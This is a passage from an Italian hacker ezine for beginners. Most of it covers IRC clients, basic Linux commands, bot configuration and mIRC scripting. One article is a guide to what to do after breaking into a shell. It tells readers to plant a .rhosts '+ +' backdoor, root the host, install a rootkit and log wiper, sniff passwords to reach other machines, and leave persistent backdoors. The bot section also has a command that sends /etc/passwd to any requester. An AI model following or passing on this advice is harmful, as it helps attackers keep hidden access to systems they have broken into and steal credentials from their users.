ircii-pana-xx-xx.tar.gz CD ./BitchX ./configure make make install A questo punto, se tutto e' andato come doveva, troverete il vostro BitchX in /usr/local/bin. Un'altra cosa.. date un'occhiata a /BitchX/include/config.h in cui potete impostare i vari settaggi come ad esempio i server di default a cui collegarsi. Vi sono poi altri files (dei quali non sto a dirvi il nome perche' sono decisamente intuitivi nella dir /BitchX in cui potete settare i vari quits, kicks, ecc.. fumate e bevete un bel po' e inventatevi delle belle frasi sklerate. Una volta collegati vi chiederete di sicuro come cambiare il vostro Name (N.d.A. la frasetta idiota che viene visualizzata nel whois per inciso..). Beh dato che il vostro ident sara' l'user da cui state facendo girare BitchX (mi auguro che non sia root :P) e' chiaro che andrete ad editarvi il vostro bel file delle pass e nella riga dell' account che state usando scrivete quello che vi pare prima della shell. Esempio pratico (raga vi devo proprio dire tutto? :P) = coatto:Xq0sm27alVwi5I:500:500:Te vojo nuda:/home/coatto:/bin/bash In cui "Te vojo nuda" sara' il vostro name e "coatto" sara' chiaramente l'ident e il nickname di default (si'.. ovviamente lo potrete cambiare il nick quando sarete su IRC :P) Quando farete girare BitchX per la prima volta non spaventatevi se non e' proprio intuitiva l'interfaccia utente come lo e' per il mIRC su Winbloz ad esempio, imparerete velocemente dato che grosso modo i comandi tipici di IRC come join, quit, whois, nick, ecc.. sono gli stessi. Vi do solo qualche dritta iniziale per non perdervi all'inizio (se poi non ce la fate proprio lasciate perdere tutto e vendete il pc eheh). Ok, siete collegati al server IRC, fate /j #canale e appena ci entrerete vedrete subito un elenco dei nicks, il topic e i settaggi (+stn ad es.); ora siete sicuramente in preda al panico perche' non capite come fare ad aprire piu' finestre dei canali o delle query.. niente panico, digitate /window new hide (tante volte quante finestre volete). Se fate Alt+2 passerete ad una schermata vuota, li' digitate /q nick per una query oppure /j #canale2 per un altro canale, se fate Alt+3 passerete alla terza schermata vuota e li' farete lo stesso se volete aprire una query o un canale (se avevate creato la nuova finestra con /window new hide). Per passare da una finestra all'altra fate sempre Alt+numero_finestra; se volete ad esempio chiudere una query in una finestra, spostatevi li' e digitate /q , quella finestra e' di nuovo vuota e potrete usarla per aprire un'altra query o un canale. Ancora una cosa, se volete di nuovo vedere l'elenco dei nicks in un canale (dato che vi verranno mostrati solo al join) fate /scan nel canale. Queste sono le cose essenziali che dovete sapere all'inizio per muovervi ed ambientarvi.. il resto, se non siete completamente negati, lo imparerete da voi usando BitchX ;) Cya on IRC guyz! \JusTme\ (Linux forever) ͻ Ŀ COME CI SI MUOVE IN LINUX ٺ ͼ Ciao :)) Questo articolo e' dedicato a tutti i "neofiti" di *nix nel vero senso della parola, cioe' quelli che appena lo hanno installato e hanno visto "login: " si sono imballati :P Beh appena vedete la scritta "login: " e' ovvio che dovete inserire il vostro username, o anche la parolina magika "root" seguiti dalla rispettiva password [che sapete solo voi, vero? :D]. Se mettete come login "root" vorra' dire che avrete accesso al sistema operativo come amministratore, e cioe' con tutti i permessi possibili. Detto questo, passiamo a una piccola rassegna dei comandi principali, magari facendo un piccolo raffronto con i comandi MS-Dos. Iniziamo va': Comando *nix Comando DOS Funzione associata cd cd cambia directory cp copy copia alcuni file mv move oppure ren muove file oppure li rinomina cat type visualizza il contenuto di un file rm del cancella alcuni file rm -rf deltree cancella sottodir e filez ls dir /w visualizza il contenuto di una dir ls -l dir come sopra, ma piu' dettagliato Beh penso che questi x un inizio possano bastare... almeno sarete in grado di fare qualche danno ;D Per ottenere la sintassi di questi comandi basta fare NOMECOMANDO --help e il mondo sara' ai vostri piedi :D cmq se conoscete il DOS non dovrete essere in grossa difficolta'... ricordatevi del fatto che *nix e' un OS case sensitive, cioe' distingue le maiuscole dalle minuscole... quindi attenzione :P Altro piccolo suggerimento... secondo me l'interfaccia grafica non serve a un cazz ma se la volete configurare e utilizzare ABBASTANZA velocemente basta scrivere xf86config, rispondere al terzo grado, e poi quando sarete di nuovo al prompt dei comandi scrivete startx... ma potete benissimo vivere senza... a sto punto Linux diventera' Microsoft Linux :D Bah penso che x stavolta ho terminato le mie fatiche... ci si sente al prox articolo raga'... ciauz :))) St0rM BriNgeR ͻ Ŀ COME SI CREA UN NUOVO UTENTE IN LINUX ٺ ͼ Ciao :)) sono sempre io :)) Stavolta giusto due righe x farvi capire la modalita' d'uso del comando adduser... Beh diciamo che sto comando serve a creare un nuovo utente [seee ma va' non l'avevo capito :D], e a modificare tutte le caratteristiche di questo utente, come gruppo di appartenenza e cazzi vari. Facendo adduser senza parametri otteniamo: [root@localhost /root]# adduser usage: adduser [-u uid [-o]] [-g group] [-G group,...] [-d home] [-s shell] [-c comment] [-m [-k template]] [-f inactive] [-e expire mm/dd/yy] [-p passwd] [-n] [-r] name adduser -D [-g group] [-b base] [-s shell] [-f inactive] [-e expire mm/dd/yy] a questo punto cerchiamo di spiegare tutte le opzioni che ci ha sparato... dunque, la prima distinzione da fare riguarda l'uso del parametro -D o meno... se questo viene usato andremo a sovrascrivere il file di default dei parametri del comando adduser... se invece non utilizzeremo questa opzione, andremo a creare un utente a seconda dei parametri inseriti nella linea di comando. -u [uid] = setta l'uid dell'utente [ma non mi dire! :D] -g [group] = setta il gruppo di appartenenza dell'utente -G = lista di gruppi supplementari a cui l'utente puo' appartenere [boh] -d [home] = setta la homedir del nostro user -s [shell] = setta la shell di partenza del nostro utente -c [comment] = un commento x il nostro utente [adduser -c lamer St0rM :D] -m = crea la homedir se questa non esiste [almeno io cosi' ho capito..] -f = numero di giorni di inattivita' necessari a disattivare la pass -e = data di scadenza dell'utente [e che e' una busta di latte? :D] -p [passwd] = la password dell'utente [kebbbbbello !!! :D] -n = crea un nuovo gruppo con lo stesso nome dell'utente -r = usata x creare un account di sistema [non vi servira' mai :P] beh penso che abbiamo concluso... SPERO :P cmq imparatelo a usare sto comando che vi servira' quando otterrete una root ;) Ciauz ci si sente al prox articolo !! :D St0rM BriNgeR ͻ Ŀ COSA FARE DOPO AVER OTTENUTO ACCESSO AD UNA SHELL ٺ ͼ Ciao :)) Beh questo piccolo articolo vuole descrivere a grandi linee le fasi da compiere x mantenere x un po di tempo l'accesso a una shell... piccola premessa: se voi bucate una shell senza molta fatica vorra' dire che l'admin e' lamer, e quindi vi dovrete regolare di conseguenza. Se invece la shell ve la passano oppure avete impiegato molto tempo a bucarla.. vuol dire che l'admin capisce qualcosa di *nix e quindi state MOLTO piu' attenti. Bhe iniziamo va': - Una volta ottenuto accesso a una shell una delle prime cose da fare e' secondo me osservare un po il sistema e le directory principali, come /usr/bin e altro. Fingerate il sistema a periodi, e vedete se l'admin e' spesso online o quanti e quali utenti si trovano sul pc nei vari momenti della giornata. - Se l'admin e' un po lamer potete mettere gia' la backdoor del .rhosts con i + + dentro, cosicche' avrete accesso alla shell anche tramite rlogin. - Dopo di questo, secondo me la prima cosa da fare e' r00tare. Non vi fate prendere dalla smania di mettere un bot un bnc un qualsiasicosa che vi possa far sgamare. - Una volta ottenuto accesso di root tramite un exploit che VOI vi sarete cercati e trovati, oppure in un qualsiasi altro modo che vi garba, io direi di piazzare un r00tkit e uno zap x eliminare qualche log e qualsiasi traccia della vostra presenza. - Ovviamente, anche altri computer avranno accesso al nostro bel server... e anche questi computerz hanno delle passwd ;D io vi consiglio di mettere uno bello sniffer in modo che da una shell otterrete altre shellz senza fatica :)) bello no? :D - Una volta fatto questo.. possiamo occuparci delle patch. Se vogliamo, possiamo lavorare x l'admin in modo che il nostro sistema diventi piu' sicuro. Ad esempio, se siamo entrati con un sendmail non recente, possiamo aggiornarlo :)) ma x questo ci vuole un po di pratica, quindi se siete newbies x davvero lasciate stare :) basta che non sputtaniate la shell... - Oki, possiamo dire che siamo quasi a posto... OOOOPPPPSSSSSS dimenticavo la cosa piu' divertente, le backdoor :D se l'admin vi sgama e vi caccia dal suo sistema, convinto che non ci tornerete piu'... beh si sbaglia di grosso! :D piazzate qualche backdoor in caso vi occorrano... e poi appena perderete l'accesso e ci tornerete sopra, mettete un bel messaggino tipo "L'hacker che ti ha bucato il sys e' tornato e ti ha fottuto x l'ennesima volta hiihihhi :D" nel motd o nell'issue, cosi' gli utenti si divertiranno a prendere x il culo il loro admin :D - Beh, fatti questi lavori viene il bello di avere una shell, e cioe' utilizzarla :D Potete fare quello che volete... mettere un bot, mettere un bnc, uploadare uno smurf, uno scanner tipo mscan, insomma la shell e' vostra e ci farete quello che vorrete. Mi raccomando, non fate ste cose con l'account di root altrimenti vi farete sgamare :D Beh, direi che con questo posso concludere... ci sentiamo al prox articolo ciauz :))) St0rM BriNgeR ͻ Ŀ FILOSOFIA DI UNIX ٺ ͼ Allora siete anche voi di quelli che hanno iniziato da poco e che si sono sentiti subito consigliare di usare linux e di studiarsi l'unix? Bene allora questa intro a unix fa x voi. Se avete sempre "vissuto" in windows e 'unica password che avete mai visto e' quella x entrare nel vs win95-98 (che poi tra l'altro basta fare esc e l'ostacolo e' saltato) allora dovete abituarvi alla filosofia unix. In unix e in linux gli utenti sono divisi in due categorie principali: lo, o in alcuni casi gli, superuser che hanno accessi privilegiati e fanno il bello e il cattivo tempo, e gli user o utenti normali che come avrete capito hanno dei poteri limitati sia nei permessi di accesso a determinati file che nell'accesso in alcun dirctory diciamo particolari. Da qui potete quindi capire qual'e' la sfida che brucia negli occhi di ogni hacker, wannabe et simili, cioe' il poter raggiungere il grado + alto di potere nel (proprio o non, non fa differenza x chi smanetta) sistema. Ma torniamo un attimo indietro. In unix il superuser si chiama root ank se alcune volte usa una "copertura" entrando nel sistema come user normale x vedere se qualcuno crea casini o x vedere chi si collega alle 4 di mattina a una universita'... Sia l'utente normale che il superuser devono avere una password composta da minimo 3 caratteri e maximo 8 caratteri (ahh... i bei tempi dei vax/vms con le pass da 25 caratteri!!!) i quali possono essere numeri e lettere sia maiuscole che minuscole. Ah, per precisione va detto che gente che il 90% degli user (o forse di + ma non mi voglio sbilanciare) usa password di sole lettere minuscole quindi capite anke voi che e' facile decrittare qualke password prese da un vecchio passwd o qualke nuovo shadow non tanto x meriti ma + che altro x la stupidita' o anke solo x ignoranza (dato che non possiamo definire stupidi chi non conosce se no molti di noi credo che sarebbero stupidi eheheh), la quale ignoranza pero' rischia di compromettere il sistema al primo attacco di qualke voglioessereuncracker che forte della sua "potenza" non vede l'ora x darsi alla formattazione rapida o ad una + godibile distruzion e cancellazion random. Ricordate quindi di usare pass con lettere e numeri ma soprattutto usate sia lettere minuscole che lettere maiuscole dato che ho conoscuto + di una persona che si vantava d avere centinaia di mega di vocabolari e poi si bloccava su password solo xche' erano tutte o in parte maiuscole... X i piu' esperti cio' che ho da dire e' poco xche' effettivamente so poco cmq unix conserva il proprio db di pass nel file /etc/shadow e nelle versioni dove non c'e' l'aggiornamento col pacchetto shadow nel file /etc/passwd. Il db di pass ovviamnte non tine ele password "in chiaro" se no che gusto ci sarebbe a trovrsele li' belle pronte ;) Ovviamente non sono neanche crittate quindi che contengono? Ebbene contengono hash monodirezionale delle password degli user e del/dei superuser. Per decriptarle poi una funzione hash monodirezionale elabora l'input e lo converte in un unico valore. Tanto x capirci quando l'utente tenta di eseguire il login, lo *nix applica alla password immessa dall'user la stessa funzione hash gia' prima eseguita per immettere la password nel db e poi fa un controllo sul nuovo valore generato e lo confronta con il valore hash contenuto nel db delle pass, dopodiche' se i due valori corrispondono, l'ser puo' entrare nella sua shell. Le + comuni funzioni hash usate negli so *nix sono il DES hash e MD5. p.s: ovviamente non sono stato a spiegare i vari campi del passwd dato che ci sono decine di testi che spiegano tale cosa e, ho saputo, la stessa cosa e' stata spiegata ben bene anche su questa ezine. Bye Bye al prossimo articolo sempre e solo qui su Newbies X-ReWoP ͻ Ŀ COME MONTARE IL CDROM IN LINUX ٺ ͼ Ciao :)) eccomi di nuovo qui x spiegarvi come montare il cdrom... NOOOOOOO che avete capito, non vi sto mica a spiegare dove dovete collegare il connettore i cavetti ide i jumper... io non ne capisco un cazz di arduer :D Questo vi servira' solo x poter leggere un vostro CD in ambiente linux... perche' come sapete [seeee come no :D] il linux non e' come il windoze che c'ha mscdex e voi inzaccate un cd e quello ve lo fa partire con l'autorun... il linux e' piu' PROFESCIONAL, ve lo dovete montare voi ogni volta hihihihi :D Bah dopo questa piccola introduzione, passiamo all'utilizzo del comando mount, che e' quello che ci servira' x montare il nostro cd. Create una dir in qualunque posto, come ad esempio sotto /mnt/cdrom, e poi eseguite il seguente comando: mount -t iso9660 /dev/cdrom /mnt/cdrom dove /mnt/cdrom e' la dir scelta da voi x montare il cd. A questo punto, x vedere i filez contenuti nel compact dirigetevi nella dir dove lo avete montato e sfogliatevi tutte le cartelle, semplice no? :D Oki, una volta finito a vedere il contenuto del nostro bel cd porno masterizzato [il massimo del warez :D], per espellere il cd dal vostro lettore NON basta premere il pulsantino di apertura dell'attrezzo :) - la prima volta che ci ho provato vidi che non mi si apriva, io non capivo il perche' di sto fatto, poi alla fine decisi che era dovuto a un calo di alimentazione del lettore cd e mi misi l'anima in pace... quando scoprii quello che NON avevo fatto mi resi conto della mia SUPERBA intelligenza :D - dicevo, per cacciare il benedetto cdrom dobbiamo digitare il seguente comanduccio da console: umount /dev/cdrom /mnt/cdrom a questo punto magikamente sara' tornata l'alimentazione al cdrom e voi potrete espellerlo con calma x inserire quello di Incarta 99 x fare vedere alla vostra mammina che non guardate i pornazzi ma che studiate ;D a voi la scelta :D Cya al prox articolo... Ciauz !!! :D St0rM BriNgeR ۰۰۰ ۰۰۰۰ ۰۰۰ ۰۰۰۰ ۰۰۰۰ ****************************************************************************** ********PANKRAZIO [guida x i bot [for really newbies but good to read]******** ****************************************************************************** Come scrivere il file di configurazione di un bot. di pankrazio PREMESSA[1]: Lo so che testi simili si possono trovare nella rete, ma per favore, non venite ad insultarmi dicendo che ho rippato i vostri articoli/siti/testi... Il fatto che siano reperibili in altri posti le stesse informazioni non significa che io abbia copiato tutto, no? :) PREMESSA[2]: Visto che ormai il celeberrimo pIGpEN viene imitato anche dagli esseri unicellulari e dalle lumache, non mi discostero' dalla massa e faro' questa benedetta introduzione demente come si deve ;) Articolo: Come scrivere il file di config di un bot Cibo consumato: Dei waferini tipo Loacker ma con una crema piu' abbondante e gustosa, una lattina di Coca cola Musica ascoltata: Le vecchie sigle dei cartoni animati (che ci volete fare, quando sento "Though Boy" mi concentro come in nessun'altra occasione!) :) Bien, direi che si puo' partire. Come probabilmente molti di voi sapranno, i bot sono dei programmi che si usano per gestire un canale (di solito, ma possono anche servire per takeoverarlo - ma non divaghiamo) in modo da dare gli op automatici alle persone registrate, Tenere sempre aperto il canale, (scongiurando il rischio di trovare un paio di op che non si conosce soli sul chan quando si joina), e altre cose sfiziose di questo tipo. Per fare un bot avete bisogno di tre cose fondamentali: Una shell Il file di config Un programma per IRC (oppure lo potete fare con gli eggdrop, ftp.eggdrop.net). Allora, per la shell non e' obiettivo di questo articolo spiegarvi come trovarne una, bensi' spiegarvi come scrivere il file di config. Ecco i comandi principali: /nick [nickdelbot] Questo serve a dare il soprannome ad un bot... es /nick Lamadonna /serv [nomeserver] Indica al bot che server deve joinare /set realname [real_name] Questo non e' indispensabile, serve per aggiungere il real name al vostro bot. /comment [commento] Per rendere piu' ordinato il testo del config, vi conviene usare questo per capire che stavate facendo mentre scrivevate... :) es. /comment UAAAAAA!! SONO PAZZOOOOHH!!! Vi consiglio di settare il comando: /set beep off Bene bene, ora dovremmo farci oppare dal bot :) Cominciamo a fargli eseguire il comando who so ogni persona che joina il canale. Cosi': /on join * /who $0 Perfetto... A questo punto dobbiamo dirgli in che condizioni deve oppare qualcuno: /on who "* * * pankrazio *orgasmo.org *" /mode $C +o $1 Mi oppera' nel caso la mia mask sara' pankrazio e il mio host orgasmo.org oppure una parte. Cosa intendo per una parte? ad esempio UARAAAAAGH.orgasmo.org :) La stessa cosa e' fattibile coi kick e coi ban. Vediamo come: /on join zcools /kick $C zcools In questo modo ogni qual volta che il nostro amico Zero joinera' il mio chan, verra' preso a calcioni dal mio fido animale da guardia... :) Si puo' kickare qualcuno in base all'host cosi', invece: /on who "* * * zcools *sono.stupido.com *" /kick $C $1 Bien, ora il nostro bot deve saper rientrare nel canale quando lo kickano e sapersi riconnettere al server quando lo disconnettono. Tutto e' fattibile con queste due linee: /on raw_irc "* KICK * * Lamadonna*" /join #canale e... /on disconnect * /serv server Bene, dopo tutto cio' siam pronti a far qualcosa di piu' complicato: far parlare il bot, facendolo rispondere! Ci sono in giro per IRC (su IRCnet non tanti, ce n'e' qualcuno su Undernet) bot abbastanza complicati che rispondono decentemente alle domande dell'utente... anche se il massimo in fatto di bot che rispondono sia Eloisa (web.tin.it/eloisa). Questo non e' un bot.. e' solo una divagazione =). Sono due le condizioni da prendere in considerazione: /on public e /on msg La prima serve a quando qualcosa viene detto sul canale, mentre la seconda per le query. Ad esempio, se volete un chan dove il bot inizia ad insultare chiunque quando sente una parolaccia... /on public "* fanculo* " / VACCI TE PEZZO DI MERDA DI UN $0 ! e avanti cosi', fino a fare una lista di 20-30 parolacce :) /on msg "yo" /msg $0 ciao Questa invece dice in query "ciao" a uno che gli ha detto "yo" :) /on msg "vogliolapass" /exec -msg $0 cat /etc/passwd Emh, non prendetela in considerazione... e' la mia mente malata :) In ogni caso questo serve per mandare l'output di un comando (in questo caso cat /etc/passwd) a chi ne fa richiesta :) Bene, direi che abbiamo finito. Per avviarla con il buon vecchio ircii dovete fare: irc -l -b config.cfg Per toglierlo dovete killare il processo (ps l per vedere il PID, poi kill -HUP PID) Tutto questo per un bot su shell Linux, a dire la verita' da win ce ne sono ben pochi (a meno di usare l'egg) Una volta un coglione mi fa: Eh eh eh, io adesso faccio un bot col mIRC, lo metto nel negozio dei miei amici che hanno una T3 sempre collegata ad Internet... eh eh eh E io: non fai prima a fartelo da una shell Linux? Lui: nopez Io: una T3.. niente male... 45Mb/s Lui: MA CHE CAZZO DICI???? una T3 va a 128kb/s!!! Io: ... Io:/ignore Lui Per pieta' ho mascherato il nick di codesto idiota... :) Ringraziamenti finali: Innanzitutto a zerocool, per l'amicizia dimostratami in questi mesi. Poi a Ljl, Le_chuck, CescoIENA, dbpass, Koog, SKAM, Acas, delsys, ^corvus^, w00w00, Vecna, Dingo, Vulcan, Guybrush-, mR_bis0n, tutta la ghenga di #emuita, #tgm, #cazzeggio, #hackernow e... basta. Grazie per la cortese attenzione. Buon proseguimento di giornata. pankrazio ===[ Per iL MONDO Di QUARZ avremo: ]=== ==[ SkRiPT mIRC? NO POBBEM! 1^tempo ]== ==========[ by E N N A R O ]========== 001 *** INDICE GENERALE *** 001 INDICE GENERALE 002 PRECISAZIO VARIANZ 003 HEADERz 004 KE MI SERVE(R) PER AKKOMMINCIARE... 005 INTRODUZIA GENERALA 006 USO DELLE VARIABILI 007 USO DEGLI OPERATORI LOGICI 008 USO DEGLI IDENTIFIKATORI 009 USO DEI KOMANDI DI mIRC 010 NELLA PROXIMA PUNTATA 011 SALUTAGGi VARi 002 *** PRECISAZIO VARIANZ *** 'Giorno a todoz guagliu'... Prima di iniziare a parlare degli skript per mirc e' bene ke io faccia alkune precisazioni: Kuesto art. non vuole essere una kontinuazione di kuello apparso il num. skorso ke portava la firma di SpYmAsTeR, in ogni kaso mi limitero' soltanto a riassumere le parti gia' trattate nell'art. mIRC scripting tutorial k?. [se kuesto ha un senZo non lo so' pero' kosi' stanno i fatti kuindi adattatevi:] 003 *** HEADERz: *** -PREREKUiSiTi NECESSARi: 10x Neuroni, un po' di volonta', la kapacita' di saper sfruttare la guida akklusa al mIRC. -OBBiETTiVO FiNALE: Riuscire a kreare uno skript senza bisogno di rippare troppo... ;) -iNKRETiENTi NECESSARi: 1x client mIRC (doh!), 1x server IRC (spiego dopo). 004 *** KE MI SERVE(R) PER AKKOMMINCIARE(iniziare) A SCRIPTARE ?? *** L'attrezzatura del perfetto skripterz konsiste (oltre al klient) di un proggy ke simuli + o - fedelmente sulla vostra makkina un server IRC kon le karatteristike di una determinata rete (IRCnet EFnet DALnet ecc.) Io ne ho provati due: -WircSRV -IRCPLUS Li potrete trovare un po' dappertutto kon un po' di ricerke nei vari siti ke rakkolgono shareware... Io personalmente ho apprezzato di + IRCPLUS in kuanto + kompleto e personalizzabile di WircSRV. Avere un server vi permettera di kollegarvi in rete lokale kon esso e testare kosi' il vostro skript. Per konnettervi in rete lokale avete varie alternative: -Digitate semplicemente [da mIRC] il komando /server 127.0.0.1 [usate la guida in linea se volete sapere /server a kosa serve] -Clikkate su GENERAL OPTIONS e poi sul pulsante Add, inserite una deskrizione a kaso, in IRC Server ci mettete il vostro indirizzo lokale 127.0.0.1 la porta ke avete scelto (in genere la 6667) e klikkate su add, kuindi su Connect to irc server avendo selezionato dalla lista dei server disponibili kuello ke avete appena aggiunto. -Kreate un popup ke abbia proprio kuesta funzione, se non sapete gia' farlo imparerete nel korso del korso =) 005 *** INTRODUZIA GENERALA *** Dunkuor kome gia' spiegato da SpYmAsTeR uno skript e' komposto da: ALIAS, POPUPS, REMOTE + altre due sezioni USERS e VARIABLES in kui andranno [in USERS] le "kategorie" assegnate dal proprio skript ad altri utenti (vedi lista amici,autoop,shitlist ecc) e [in VARIABLES] le variabili a kui ovviamente saranno assegnati dei valori ke lo skript potra' utilizzare in seguito. Diciamo subito ke la sezione REMOTE e' la piu' importante ed e' kuella ke *DOVREBBE* essere sviluppata per prima dal momento ke le altre sezioni in un certo senZo sono "konseguenze" dello sviluppo di kuesta. Prima di passare allo sviluppo di kuesta sezione pero' dobbiamo konoscere alkune kose: -Uso delle variabili -Uso degli operatori logici (If-elseif-else) -Uso degli identifikatori (Identifiers) -Uso dei komandi di mIRC (basta konoscere i principali gli altri li konsultate tramite l'help) 006 *** USO DELLE VARIABILI *** In breve kreare una variabile konsiste nell'assegnare un determinato valore ad un determinato nome di variabile [ke kaxxo di definizione =] Le variabili ke noi andremo a inserire all'interno dello skript saranno tutte inkluse nella sezione VARIBLES kome accennato prima. Vi sono vari komandi in mIRC per la manipolazione delle variabili e sono tutti molto importanti se non essenziali: [NB le varibili sono *sempre* precedute dal simbolo %] /set %X Y Krea una variabile di nome X e di valore Y. /unset %X Rimuove una variabile di nome X /inc %X N Akkresce il valore di %X di N unita' /dec %X N Diminuisce il valore di %X di N unita' [NB vi sono altri komandi e varie opzioni per kuesti relativi alle variabili {imparate a konzultare l'help :}] Facciamo subito un esempio tanto per fermare nella mente kuesti komandi, kreiamo un alias nell'apposita sezione di mIRC: /profa01 { /set %profa01 33 /echo (valore originario) %profa01 /inc %profa01 33 /echo (valore aumentato di 33) %profa01 /dec %profa01 66 /echo (valore diminuito di 66) %profa01 } Okki kuesto alias e' talmente idiota ke evito di kommentarlo [sara' la vekkiaia??] e se non sapete il komando echo ke vuol dire... o ve lo cerkate o vi suicidate perke' non lo sapete... ;) Va' detto ke kon le variabili si possono eseguire delle operazioni ad esempio nell'alias di prima mettendo il valore 33 + 1 mi avrebbe restituito 34 al primo echo e kosi' via... Le operazioni possibili sono: + addizione /set %profa01 33 + 1 - sottrazione /set %profa01 33 - 1 * moltiplikazione /set %profa01 33 * 33 / divisione /set %profa01 33 / 44 ^ elevamento a potenza /set %profa01 33 ^ 33 E' possibile anke eseguire operazioni tra variabili: /set %a 33 /set %b 44 /set %c %a * %b Kiaro?? In ogni kaso sperimentate da soli il funzionamento delle variabili, vi servira' a memorizzare i komandi e a impare a usarle... 007 *** USO DEGLI OPERATORI LOGICI *** Vi vedo distratti ke sara'?? Vi e' venuta un'ulcera agli okki, vi sono skaduti i 10 neuroni ke servivano? Se non volete rippare a vita dovete impararle kueste kose... e kuelli di voi ke resteranno fino alla fine senza saltare nessuna parte avranno il diploma di sKripter plakkato in oro da NOBODY88 e l'esklusiva karta igienika kon la filigrana di NewBieS! Dunkuor, gli operatori logici konfrontano determinati valori ed eseguono dei komandi in funzione del risultato del konfronto effettuato. La forma base di kuesto konfronto e' la seguente: funzione logika (valore1 operatore valore2) { komandi da eseguire } Le funzioni logike possono essere:IF[se] ELSEIF[se alrimenti] ELSE[altrimenti] e se non kapite ke signika se o altrimenti, lasciate perdere non e' kolpa vostra ve la dovete prendere kon vostra madre :[ I valori (valore1 e valore2) possone essere delle variabili o dei valori fissi; gli operatori sono molti e sono la kiave di lettura dell'intera stringa essi si okkupano di konfrontare kon determinati parametri i due valori, i piu' importanti operatori sono: == uguale a != diverso da < minore di > maggiore di <= minore uguale di >= maggiore uguale di ... Ce se sono molti altri ke voi DI SIKURO andrete a vedere/imparare dall'help in linea, in ogni kaso facciamo alkuni esempi per sckiarire le idee, prendiamo kome base l'alias di prima: /profa02 { ;i punti e virgola introdukono un kommento se non lo sapevate =) /set %profa02 $$?="iNZERiSCi UN NUMERO A KAxxO:" ; $$?="..." e' un identifikatore ke kiede di inserire un valore ; kon una rikiesta specifikata da voi... if (%profa02 < 50) { echo -s %profa02 e' un num. minore di 50 } ; se %profa02 e' minore di 50 allora ... elseif (%profa02 == 50) { echo -s %profa02 e' il num. 50 } ; se invece %profa02 e' uguale a 50 allora... else { echo -s %profa02 e' un num. maggiore di 50 } ; altrimenti ... } [NB l'opZione -s di echo obbliga il komando a visualizzare l'output sulla finestra STATUS] Tralasciando l'eccessiva idioZZZia dell'alias, esso vi mostra l'impiego degli operatori logici principali, nel kaso in kui si vogliano kombinare le komparazioni rendendone necessarie piu' di una, o almeno una di esse, si usano rispettivamente gli operatori AND e OR; AND e' rappresentato da &&, OR da ||, in ogni kaso per non riskiare di surriskaldare i vostri adorabili 10 neuroni di kui avete bisogno, procediamo a un'altro esemplio: /profa03 { /set %profa03 $$?="iNZERiSCi UN NUMERO A KAxxO:" if (%profa03 == 1717) || (%profa03 = 7171) { echo -s %profa03 e' 1717 oppure 7171 | halt } ; se %profa03 e' uguale a 1717 o a 7171 allora... if (%profa03 > 50) { echo -s %profa03 e' un num. maggiore di 50 } ; kuesta la kapite da soli... if (%profa03 < 20) { echo -s %profa03 e' un num. minore di 20 } ; kuesta pure... if (%profa03 > 20) && (%profa03 < 50) { echo -s %profa03 e' kompreso tra 20 e 50 } ; se %profa03 e' maggiore di 20 e minore di 50 allora... } [NB halt serve per terminare l'esekuzione dell'alias ed e' stato messo in kuanto 1717 e 7171 sono entrambi maggiori di 50 e avrebbero kuindi attivato anke la sekonda stringa if... understand paisa'??] 008 *** USO DEGLI IDENTIFIKATORI *** ...mmm... ad ogni paragrafo siete sempre meno ... beh ke vi posso dire rikordatevi della karta igienika per kuelli ke arriveranno alla fine!!! Gli identifikatori(non so' se e' kuesto il termine italiano korretto ne' mi interessa saperlo io li kiamo identifiers...) in sostanza rilasciano il proprio valore ke hanno assunto in kuel determinato momento. Se un identifikatore non puo' kalkolare il proprio valore rilascia il valore $null un valore nullo appunto. Ekko un esempio elementare dell'uso di un identifikatore: /profa04 { echo $duration($$?="iNZERiSCi UN NUMERO Di SECONDi DA KONVERTiRE:") } L'identifikatore $duration restituisce il numero di sekondi immesso nel formato settimane/giorni/ore/minuti/secondi. Vi sono diverse categorie di identifikatori per un numero komplessivo molto alto, e non e' affato necessario impararli basta konsultare l'help kuando serve e implementare nei propri script, in ogni kaso le kategorie piu' importanti sono le seguenti [bella rimah]: -Ident. di tempo e data -Ident. di indirizzo e nick -Ident. di testo e num. -Ident. di finestra Affinale non vi e' piu' nulla da kapire sul funzionamento degli identifikatori e poi a tempo debito li analizzeremo uno per volta kuando dovremo inserirli nella sezione remote, per ora potete dare uno sguardo all'help e sfogliare la varie kategorie di ident. ma ripeto non serve a un gran ke farlo... 009 *** USO DEI KOMANDI DI mIRC *** Bene, benetton, vi lascio un kompito per kasa: aprite il vostro help del mIRC e sfogliatevi la sezione *mIRC Commands* non e' necessario ke impariate tutti i komandi, ma komunkue dateci uno sguardo, i komandi sono kome i komponenti di un'auto, non ne potete kostruire una solo kon i karburatori e le spazzole per i tergikristalli, kosi' per gli skript dentro non ci potete mettere solo /echo /quit e /join dovrete metterci ben altro... 010 *** NELLA PROXIMA PUNTATA *** Vedete di prokurarvi un server irc da installarvi perke' sara' essenziale. Finalmente inizieremo a parlare di kome strutturare delle risposte agli eventi e se ce la faccio vi spiego pure kome implementare alkune protezioni... In kuest'art. avevo detto a Nobody88 ke vi avrei parlato gia' della realizzazione di uno skript, e delle relative protezioni e automatismi, ma skrivendo kuesto art., mi sono akkorto ke senza una base non sareste andati molto lontano... 011 *** SALUTAGGi VARi *** SALUTI ALLA MIA KREW: -AnArChY per me sarai siempre l'anarkiko =)) -CrazyHorzo un'altro floddattero kome me... -N0CE & Kaliforn & Kelvin KAxxO fateve senti'!!! -agli altri un saluto generiko :P SALUTI A GENZ VARIA: -^S|{0rP|0 un 'ggiorno riusciremo ad ankontrarci =))) -|guly- infinite tenkese per tu sai kosa ;) -ghimlet se non mi avresti detto 4 mesi fa di prokurarmi un portscanner non avrei mai studiato l'hack... -micio2 azzo non ti riesko a bekkare piu' fatti senti' in email pliis =) -SALUTO A _kuasi_ TUTTO #HACKERNOW [i bot mika li devo saluta'...] byez genz byez ENNARO ennaro@iname.com Mekkanici Digitali Member ͻ Ŀ IRCWAR - FONDAMENTI ٺ ͼ Quando si parla di IRCWar ci si riferisce in genere a cose tipo takeover di canali e cosi' via... per capire bene questi discorsi bisogna avere una piccola base riguardo irc, i server irc, i netsplit e alcuni comandi e modi di ircnet. Diciamo che il terreno di battaglia principale dei takers e' lo split o il desynch. I server irc splittano a causa del sovraccarico della rete. In genere, prima e dopo lo split c'e' un periodo di desynch, cioe' di desincronizzazione dei server. In questi periodi possono accadere strane cose.. facciamo qualche esempio: - Puo' accadere che un utente kicki un altro utente su un server, ma che su un altro server risulti ancora che l'utente kickato stia dentro il canale. Ovviamente l'utente che e' stato kickato legge ancora quello che gli altri scrivono, a loro insaputa, ma lui non puo' comunque scrivere, in quanto riceve il messaggio "Cannot send to channel". - Se un canale 